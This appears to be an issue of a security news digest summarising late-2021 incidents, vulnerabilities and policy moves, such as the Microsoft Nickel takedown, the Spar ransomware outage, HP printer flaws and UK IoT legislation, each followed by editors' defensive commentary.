Microsoft’s Digital Crimes Unit has taken steps to disrupt operations of an advanced persistent threat (APT) group with ties to China. Recently unsealed court documents show that Microsoft was granted the authority to seize websites in 29 countries that were used by the hacking group, which it has nicknamed Nickel.

Note

  • This operation is significant in scope and impact. In particular the takeover of command and control domains from the threat actor will allow Microsoft to continue to identify victims. The report also demonstrates how even apex-grade threat actors use commodity tools, such as mimikatz and NTDSDump. They can do that only because these tools continue to work in victim environments.
  • It is hard to complain about Microsoft shutting down malicious websites, but the bulk of the attacks launched by Nickel and others were exploiting the continuing stream of critical vulnerabilities in Microsoft’s software. It is kind of like if Tesla formed a Digital Crimes Unit to shut down thieves that were stealing Tesla cars because the Tesla door locks didn’t work.
  • It is excellent that Microsoft is taking steps against those working to exploit the vulnerabilities in their systems. One hopes they are spending as much or more energy on fixing those weaknesses. For the rest of us, keep an eye on updates to both our endpoint operating systems and protection products. Make sure they are reporting in regularly and that your responders have what they need – resources and training – to respond to detected maleficence.

Read more in

Gen. Nakasone: US Military Has Taken Action Against Ransomware Actors

The US military has taken action against ransomware actors, according to head of Cyber Command General Paul Nakasone. Prior to the Colonial Pipeline and JBS attacks, the government saw ransomware attacks as the purview of law enforcement. Nakasone said that Cyber Command would take action against any cyberthreat actors that target US infrastructure, whether or not they have geopolitical ties. Nakasone also heads the National Security Agency (NSA).

Note

  • What makes this announcement new is the US military is now stating it will not only respond to and target nation state actors but also cyber criminal actors. A big part of this is because the impact of both nation state and cyber criminals are starting to blend. Both can have a direct impact to the country’s ability to operate at a political, economic or military level as both can and do have an impact on critical infrastructure. I believe this is a step in the right direction. Until cyber criminals face consequences for their actions, they have no motivation to stop attacking; cyber crime is simply far too profitable and effective. Law enforcement is one approach, but difficult when the cyber criminal actors are protected by their host country. Other methods like these may be required.
  • The US has a long history of separating military and law enforcement actions. Ransomware seems to be a rare case where national security interests justify a military response. However, we must be careful as a nation not to normalize military operations in criminal actions, either for investigation or response. It’s not hard to see the slippery slope here – especially because CYBERCOM has had real successes where law enforcement authorities were simply not sufficiently matched to the ransomware threat.
  • Response to cyber criminals, such as ransomware actors, will need multiple agencies across multiple countries. Bringing available resources and expertise together will help with takedowns of these groups; the NSA and Cyber Command have already started cooperating with other agencies to increase the effectiveness of these activities.
  • The story below on GAO asking government to act along with this story confirming the military is acting is what we will continue to see in the short term. Organizations have proven they cannot defend themselves against ransomware. We will follow and report the evolution of the fight against ransomware and hope it leads to its demise.

Read more in

GAO: Government Must Take Steps to Protect Critical Infrastructure

In testimony before the US House Committee on Transportation and Infrastructure, the Government Accountability Office (GAO) warned that the government must take action to protect the country’s critical infrastructure from cyberattacks.

Note

  • Now is the time to get acquainted, or reacquainted, with your local CISA contacts. They will be driving at the direction of DHS, any actions (technical or reporting) needed. Expect pressure to follow and report the use of NIST frameworks and standards as well as reporting security metrics via the Continuous Diagnostics and Mitigation (CDM) program. If you’re following other security frameworks, the NIST CSF documentation includes tools for mapping other security frameworks to NIST controls such as SP 800-53, which you can leverage.
  • From the perspective of my small town’s water district, this message may be well-received, but without additional resources, little will change. Personal agenda: I’d love to see National Guard units gain authority to assist such organizations during regular training assemblies under supervision of CISA. They have the skills, the community ties, and 39 days per year to train.
  • While the “Government” in this particular piece refers to the US government, I think it is safe to say the same commentary can be aimed at nearly every other government across the globe. For too long, governments have under-invested and under-resourced cyber security, relying on the private sector to fill the gap. Unfortunately, that gap still remains unfilled.

Read more in

HHS Launches Healthcare Sector Cybersecurity Website

The US Department of Health and Human Services (HHS) has launched a website for its 405(d) Aligning Health Care Industry Security Approaches Program. The site offers cybersecurity resources for the healthcare sector, including recommended products, tools, and mitigations.

Note

  • The HHS 405 (d) Program, established in response to the Cybersecurity Act of 2015, is looking for participation to make this site relevant and useful. The intent is to provide vetted practices, which means they are looking for input from those in the field with relevant experience about what does and does not work.
  • Cybersecurity professionals working in security should provide feedback to HHS on how to make this site useful to their efforts. My first impression is it is heavy on pointing to products and light on people/processes/skills. What I’d really like to see is more case studies: “Here’s how a healthcare company like you overcame the unique obstacles to securing systems faced in healthcare.”

Read more in

Spar Supermarkets Hit with Cyberattack

Hundreds of Spar supermarkets in the UK have been temporarily closed due to a cyberattack that affected the store’s payment processing capabilities. Some stores affected by the attack switched to cash only transactions. The National Cyber Security Centre is aware of the issue.

Note

  • This appears to be a supply chain type of attack. According to the BBC (www.bbc.com: Spar cyber attack hits more than 300 convenience stores) the external IT provider who manages the IT and till/register systems for the affected Spar shops is the victim of the ransomware attack. This attack again highlights the importance of managing third-party risk and assessing how a ransomware attack against one of your suppliers, in particular those deeply embedded in your IT infrastructure, would impact your business and to then put in appropriate controls to manage that risk.
  • In retail, the holiday season often comes with a change freeze for IT, and with that the inability to apply patches. At the same time, ransomware actors in particular realize that retail stores are dependent on holiday sales. While Spar is more a generic grocery store chain, they will likely still see increased traffic in their stores during holidays.
  • I worked my way through college in retail where we had no electronic POS system, to include the old knuckle-buster credit card machines and know what it’s like to chase down errors in making change. After 20 months of electronic payments versus handling cash, you may need to provide a refresher to those handling cash to avoid errors, particularly if the POS system is offline. Make sure your backup/manual procedures are still accurate.

Read more in

Cyberattack Hits Colorado Utility

The Delta-Montrose (Colorado) Electric Association (DMEA) experienced a cyberattack in November that disrupted billing systems and destroyed 20 years of records. DMEA expects to have its billing systems up and running sometime this week.

Note

  • Double check that your backups are disconnected, differential and resistant to ransomware attacks. Don’t forget to look at your records retention practices. As many records have been digitized, moved on-line and the paper shredded, those too need to have secure backups for the retention period.

Read more in

HP Releases Firmware Updates for Printers

HP Enterprises has released firmware updates for more than 150 models of its multifunction printers. HP learned of the vulnerabilities from F-Secure in April 2021. One of the issues addressed in the updates is a critical buffer overflow vulnerability; the other is a high-severity information disclosure vulnerability. The flaws could be exploited to take control of vulnerable devices, steal information, and gain access to networks.

Note

  • This vulnerability affects printers for the last few years. If you have an HP printer, it is likely vulnerable. Update your firmware in particular if the printer is reachable over a network. The other exploit scenarios may be less of a problem if the printer is located in a home office without easy access.
  • Coincidentally, the SANS Holiday Hack Challenge will feature a printer hack this year. As an overlooked part of most infrastructure networks, printers make interesting targets for adversaries since they are seldom subject to rigorous patch management processes. We thought it important to highlight printer vulnerabilities as a common threat for many organizations.
  • By now, network-attached printers should be fully covered by vulnerability management processes, across their entire lifecycle, including disposal. If not, there have been real world damage-causing exploits against printers over the past 5 years – seeing vulnerabilities that include code execution should be a red flag for action.
  • Make sure you’re installing firmware updates on your printers. If you’re using a third party double check their practices. Understand controls which allow or disallow Internet printing before enabling that capability. As many printers now cache information and have ports for USB or other memory cards, consider locations away from unescorted access, not just to prevent media insertion, but also limit unintended browsing of sensitive output. Consider using devices that permit jobs to be queued/paused until the requester is physically present.

Read more in

AT&T Networking Devices Infected with Botnet Malware

AT&T is dismantling a botnet that had established itself within the company’s network. The malware affected EdgeMarc Enterprise Session Border Controller appliances.

Note

  • Last week, we had a story about Sky waiting a year to patch customer premise equipment. AT&T didn’t want to be outdone and is now, four years after the vulnerability was originally reported, and after it is actively being exploited, considering steps to mitigate it. In your office (and home office) network design: Treat ISP supplied equipment as hostile and outside your perimeter.
  • The report suggests that AT&T’s use of wildcard certificates may have enabled the malware to get broad internal access. NSA put out a warning about wildcard certs in October 2021. (Just search for “NSA ALPACA” because the creative folks at Ft. Meade used that very cool acronym for “Application Layer Protocols Allowing Cross-Protocol Attacks” vs. earlier use of it for Application Layer Protocol Confusion attacks.)
  • In addition to wildcard certificates, it appears these devices also have default credentials which need addressing. A patch was released in December 2018, about 19 months after the first discovery of the flaw. Application of the patch requires manual updates.

Read more in

NSS Crypto Library Flaw

Mozilla has released fixes to address a critical flaw in the Network Security Services (NSS) cryptographic library. The heap overflow vulnerability affects all versions of NSS older than 3.73 and 3.68.1 ESR; it was detected by Google Project Zero’s Tavis Ormandy.

Note

  • The NSS library isn’t as well-known as openssl, but the scope of its use is similar. Many clients, and in a few cases servers, use this library. As so often with these library flaws, patching the library is just a first step. You may also need to patch software using it.
  • Tavis’ write-up of this flaw indicates that redirecting code execution is trivially exploitable. NSS is used by Firefox, Thunderbird, and a variety of other software projects from RedHat, Oracle, SUSE, and others: developer.mozilla.org: Overview of NSS Open Source Crypto Libraries
  • This applies to products which use the NSS for handling signatures such as Thunderbird, LibreOffice, Evolution and Evince. The fixes to Thunderbird were released 30 days ago, so the fixed libraries are now available for public download. This also means the most current releases of these products include the fixes, make sure they’ve been updated in your environment.

Read more in

Panasonic Discloses Network Breach

Panasonic has disclosed that its network was breached earlier this year. The attackers had access to the network from June through November 2021. Panasonic noted that the intruders had accessed some data on a file server.

Note

  • There are two issues here – closing the access path and determining the level of access or damage. Could you detect accesses to your file servers or other resources that happened six months ago or are you rolling the logs over when they get “too big” irrespective of duration? While Panasonic says nothing about the exact access method, you may want to make sure that you’re actively disabling inactive accounts, only granting users the access they need for their role with a regular review to ensure they are not over permissioned.
  • Attacker ‘breakout time’ is a metric we use to measure the amount of time it takes an attacker to go from initial exploitation to secondary post-exploitation or lateral movement within a network. For sophisticated attackers, breakout time is measured in minutes, or hours. Panasonic’s case is not unusual, where it may take an organization several months to identify a compromise. Threat hunting and red team exercises can help shorten that detection window, but must be supported by a strong incident response process.

Read more in

Former Ubiquiti Employee Arrested for Data Theft and Extortion

Law enforcement officials have arrested a former Ubiquiti employee for stealing data and then attempting to extort nearly $2 million from the company. Nickolas Sharp also allegedly posed as a whistleblower, planting false news stories about the breach.

Note

  • I have seen some talk about how to detect the kind of activity this developer used to collect the information. Many suggestions do not take into account the access developers need to work effectively. A developer typically needs read access to repositories other than the one they are working on even for little things like a quick copy/paste. Do not use this incident to make your developers’ lives any more difficult.
  • This is a case of a trusted insider, with administrator access, abusing those privileges, including modifying logs to cover his tracks. Further, he leveraged an incident to mask his activities. This is an excellent scenario for a tabletop exercise to talk about prevention and discovery. Consider actions such as forwarding logs to a centralized service to reduce the likelihood of modification; performing traffic flow analysis coupled with other DLP tools to discover data exfiltration. Make sure that you’re collecting information from insource, outsourced and cloud systems wherever possible.

Read more in

Bulletproof Hosting Provider Sentenced to Prison

A US federal judge in Michigan has sentenced Aleksandr Grichishkin to five years in prison for providing bulletproof hosting services that were used to operate botnets, spread malware, and steal sensitive financial information. The service hosted Zeus, SpyEye, Citadel, and Black Hole malware.

Note

  • There’s a long history in the US of the RICO (Racketeer Influenced Corrupt Organization) act to go after those who knowingly profit by selling products and services to bad guys who meet the broad definition of RICO. While it is so broad that there have been abuses, it is good to see convictions (and asset seizures) coming against the modern equivalent where services providers are profiting from criminals. Good to use this to notify the product/service side of your company of the need to “know your customer.”

Read more in

TSA Cybersecurity Directives for Passenger and Freight Rail

The US Transportation Security Administration (TSA) has published cybersecurity directives for freight and passenger rail. The directives require that cyber incidents are reported to the government within 24 hours after they are detected. They also require cybersecurity assessments and incident response plans based on the results of the assessments.

Note

  • The first directive is to designate a cybersecurity coordinator to perform the identified tasks. The question is – do you have someone in a similar role? This is a liaison between you and your regulator, relevant ISAC or even CISA. This would also be a good person to coordinate vulnerability disclosure activities.

Read more in

BadgerDAO and MonoX Disclose Cryptocurrency Thefts

$120 million in cryptocurrency was reportedly stolen from the BadgerDAO blockchain decentralized finance platform wallets earlier this week. Badger believes the theft involved a malicious script in their website’s user interface. Badger froze smart contracts after learning of the thefts. In a separate story, MonoX Finance reported that an attacker exploited a bug in smart contract drafting software to steal $31 million in cryptocurrency.

Note

  • Access leveraged an API key which was allegedly protected by 2FA. When you implement 2FA, you need to implement it properly. This is another case where you don’t want to “roll your own,” use an existing tested solution, then test your implementation rigorously.
  • Insert usual comments here about why the term “cryptocurrency” is an oxymoron. Another note: calling the “MonoX Finance” software is like calling your kid’s fingerpainting “art.” The token abuse exploited is pretty much the equivalent of the web price changing vulnerabilities that worked in the first online commerce sites decades ago.

Read more in

Airgap Attack Frameworks

Researchers from ESET have published a report examining all known frameworks that have been used to attack air-gapped networks. ESET notes that all the frameworks were designed for purposes of espionage and all used USB drives as the primary vector of transmission. Additionally, all known frameworks were designed to attack Windows systems.

Note

  • If you’re relying on air-gapped networks for security, review the white paper to understand what processes can be leveraged to cross that gap and how to secure them. Look first at how you’re transferring information in and out of those systems, making sure only trusted files and media are allowed, that you’re scanning that media aggressively.
  • Systems that are not connected to the public networks for security reasons are probably sufficiently sensitive that they must be protected physically.

Read more in

Windows Installer Flaw is Being Actively Exploited

Attackers are actively exploiting an inadequately patched flaw in Microsoft Windows Installer to gain admin rights on vulnerable systems. Microsoft released a fix for the medium-severity privilege elevation flaw in November’s Patch Tuesday release, but the researcher who initially detected the flaw has detected a more serious variant. The vulnerability affects all versions of Windows.

Note

  • Not much you can do about this right now. But remember, that this is “just” a privilege escalation flaw. Sadly, privilege escalation flaws are common enough to always assume that there are a few being exploited for which no patch is available.
  • This is a great example of where vulnerability management and purple teams will provide value added to the organization. The VM team should be on top of situations like this where a patch doesn’t completely remediate the vulnerability. The purple team should be ready to assist in crafting detections that align with the organization’s telemetry. For those with neither team, know that this is a Local Privilege Escalation (LPE) vulnerability and can only be triggered by a threat actor who already has gained execution on the system. It also poses increased risks for insider threats who might seek to elevate their privileges.
  • The flaw allows for privilege escalation using an existing account. While the long-term fix is another update from Microsoft, in the short term you can leverage the Snort rule SSID’s 5865 and 58636 to block exploitation. Note these are in the Snort Subscriber Ruleset, not the free Community Ruleset.
  • Pen testers: it’s good to exploit these types of flaws, but do consider what your recommendation is beyond, “Implement patch when available.” What detections can you recommend? What possible follow-on actions might defenders look for? Are there other compensating controls (specific to their environment) that can lessen the frequency or severity of privilege escalation vulnerabilities like this one?

Read more in

Health-ISAC Guidance on Identity-Centric Approach to Cybersecurity

New guidance from the Health Information Sharing and Analysis Center (Health-ISAC) provides an identity-centric approach to cybersecurity to help health care organizations comply with 21st Century Cures Act requirements without introducing vulnerabilities. The 21st Century Cures Act requires healthcare organizations to create new APIs that operate on the Fast Healthcare Interoperability and Resources (FHIR) standard and that enable interoperability of electronic health data. Recent research has shown that there are security concerns posed by the FHIR API ecosystem.

Note

  • Exposing these systems directly to patients requires strong identity management practices, as outlined in the guidance. While MFA is optional, there are risks to not implementing it: think HIPAA violations and associated penalties. Prepare to federate authentication by leveraging OAuth and OpenID Connect, monitor your API use, respond to anomalous activity.
  • Back in the early 2000’s, the firewall was a mark of the rise of infosec. Firewalls separated friends from enemies – and weak defenders from strong. Now that “identity is the new perimeter,” secure, easy-to-use identity solutions are becoming a new mark. As traditional username:password continues to disappoint, what technology will fit your organization well?
  • In an attempt to avoid being overly prescriptive, HIPAA required covered entities to do risk assessments that they were poorly equipped to do. One effect was to retard the adoption of electronic health records by a generation.

Read more in

Proposed UK Legislation Aims to Improve IoT Device Security

Proposed legislation in the UK would establish mandatory security standards for Internet of Things (IoT) devices. The Product Security and Telecommunications Infrastructure Bill would apply to IoT manufacturers, importers, and distributors. The bill would let “the government … ban universal default passwords, force firms to be transparent to customers about what they are doing to fix security flaws in connectable products, and create a better public reporting system for vulnerabilities found in those products.”

Note

  • It’s easy to joke about the limited impact of eliminating universal default passwords, but the impact is substantial. Just last week NewsBites reported on a DNS rebinding vulnerability in Sky routers that allowed full device takeover. But this was only possible because of universal default passwords. I’m also excited about the prospect of increasing transparency, but that’s much harder to measure and only time will tell how this is implemented.
  • A number of governments have put forward initiatives to make it easier for consumers to recognize secure devices. This is the first one I am aware of that spells out mandatory requirements to be allowed to sell devices. I like the idea to put the responsibility at the manufacturer instead of the consumer. It is no longer the consumer failing to change default passwords, but it calls manufacturers out for delivering devices with common default passwords. My wishlist for IoT security also includes well-defined “end of support” dates.
  • While the legislation is likely to be modified before final passage, imposing fines for non-compliance to security standards should help motivate vendors to meet the required minimums. What is needed is equivalent standards in multiple countries to raise the bar across the board.
  • This is a small but important step forward. These few requirements will not make IoT fully secure but they establish an important floor, kind of like restaurants being required to at least have working refrigerators and rodent control systems or they can be shut down. Doesn’t mean the food can’t still be poisonous but people are still safer for it.

Read more in

Problematic Patch Impacts Microsoft Defender for Endpoint

A buggy patch has caused problems for Microsoft Defender for Endpoint on some Windows Server devices. Users running Windows Server 2019 devices with update KB5007206 or later and Windows Server 2022 devices with update KB5007205 or later installed have reported that Microsoft Defender for Endpoint will not launch.

Note

  • Good News/Bad News: The Good News is this doesn’t impact desktop or other non-server Windows distributions; the Bad News is the problematic patch only affects Windows Server systems running the Windows Defender service. If you’re using a different endpoint protection service, you’re not impacted. Note that if you are using Windows Server versions for desktop virtualization, such as AWS Workspaces, you should make sure you’ve got another endpoint protection service running.

Read more in

UK Ministry of Justice Disables Poorly Protected ICS Wi-Fi Access Points

The UK’s Ministry of Justice has disabled several Wi-Fi access points that were inadequately secured. The access points could have been used to gain access to industrial control systems (ICS) that manage boiler pumps in the Royal Courts of Justice. The access points did not require passwords and led to an ICS login page. The Ministry of Justice was alerted to the problem by British tech news website The Register.

Note

  • I want to be surprised, but I can’t be. This sounds like it is really part of a building management network, a specific type of ICS. Unfortunately, in most cases building management networks are installed and configured by vendors and maintained by staff that are more comfortable with a wrench than a command prompt. It is not at all uncommon to discover building management networks very poorly secured. Work with your organization to determine how your connected building management systems fall under the purview of the cybersecurity team. If not, make a strong case to secure them. When the proverbial poop hits the fan (or a threat actor just turns the fans off), it *will* be considered a cybersecurity problem.
  • These interfaces were intended to allow for remote management and optimization of the system. While wireless control is often a provided component, it must be secured during deployment. The added problem is many ICS/IoT systems have default credentials, which are published in documentation which is generally accessible online. In short make sure that your wireless interfaces are securely configured, and that you change default credentials. Verify these credentials and configuration remain set after a reboot or power cycle.

Read more in

Vestas Says Cyberattack Was Ransomware

Danish wind turbine manufacturer Vestas has confirmed that a November 19 cyberattack was in fact ransomware. The company says that most of its IT systems are now operational.

Note

  • Vestas is still recovering from the incident, so don’t expect a full recounting until that completes and the incident investigation completes. Research by Coveware shows the average downtime from Ransomware to be 16.2 days and average payment is $140,000 in Bitcoin.

Read more in

DBS Bank Suffers Intermittent Outages

Singapore’s DBS Bank experienced outages last week that prevented customers from accessing their online accounts. The Monetary Authority of Singapore “expects DBS to conduct a thorough investigation to identify the root causes and implement the necessary remedial measures,” and will determine what “supervisory actions” to take after that assessment is complete.

Note

  • Online services have gotten more complex. That increases the difficulty of protecting them, but also the difficulty of assuring required service level agreements can be met at all reliably. If one service relies on 5 suppliers with .99 SLAs, you can still on average meet a .95 SLA requirement. But, if any supplier is at or below .95, you can’t. Protecting against cyberattacks means keeping availability above the required level – if all margin has been consumed by unreliable service, even a minor incident can result in major financial damage.
  • This comment is for the DBS story and the Vestas story above. Traditionally cybersecurity has focused on confidentiality and integrity of data, as that is where the value is for both cyber criminals and nation state actors. But within the past 18 months it seems we have seen a dramatic rise in availability issues also. By availability I mean the operational capability for an organization to fulfill its mission. In most cases the shutting down of operations is not the end goal of the threat actor, but either merely a means to an end (extortion) or accidental collateral damage (NotPetya like incidents). Most likely these availability impacts will only increase as our world becomes more interconnected and interdependent on each other. Finally, unlike confidentiality and integrity incidents, availability based incidents can have an immediate and physical impact to people at a large scale.

Read more in

Maritime Services Company Suffers Cyberattack

Singapore-based maritime services firm Swire Pacific Offshore has disclosed that it was the victim of a cyberattack. The incident “resulted in the loss of some confidential proprietary commercial information and … some personal data.”

Note

  • It is interesting to note that Singapore data protection laws require data breaches to be reported to the government; failure to report can result in a fine of about $7,300 or a two-year jail sentence. The full details of this incident may only be revealed in that reporting process.

Read more in

CISA Publishes Mobile Device Cybersecurity Checklist for Organizations

The US Cybersecurity and Infrastructure Security Agency (CISA) has released a mobile device security checklist for organizations. CISA’s recommendations include enabling automatic updates through a Mobile Device Management system; establishing a trusted devices policy; and enabling two-factor authentication. CISA also urges organizations not to allow mobile devices to connect to critical systems.

Note

  • This checklist is device agnostic. Consider the points in the checklist, making sure you can detect compliance and non-compliance with your chosen options. For example, how granular is your OS version/update detection, and will that match your patch/update requirement enforcement? Consider what sorts of data persist on your mobile devices and what applications you allow them to access, and how you can isolate enterprise applications and data on the devices. I created a similar checklist which used to be included in the SANS SEC 575 course; the trick is maintaining it to keep it relevant.
  • Recommendations should distinguish between enterprise-managed and user-managed devices.

Read more in

GAO: CISA Needs to Assess Effectiveness of Communications Sector Programs

According to an audit report from the US Government Accountability Office (GAO), the Cybersecurity and Infrastructure Security Agency (CISA) “has not assessed the effectiveness of its programs and services to support [the communications] sector.” GAO has made three recommendations: Develop metrics and analyze feedback from sector infrastructure owners and operators to determine the programs’ effectiveness; Assess capability for Emergency Support Function #2; and Revise sector specific plan “to include goals, objectives, and priorities that address new and emerging threats and risks to the Communications Sector and that are in alignment with sector risk management agency responsibilities.”

Note

  • Where are you getting guidance and support for cyber security? Are you following up-to-date guides or are you still looking back to information published “a while ago?” Look for updated versions of your current guidance. If they don’t exist, then look to alternate references for alternatives. Make sure that your self-assessments include effectiveness reviews of your cyber security protections, to include your MSP if used.

Read more in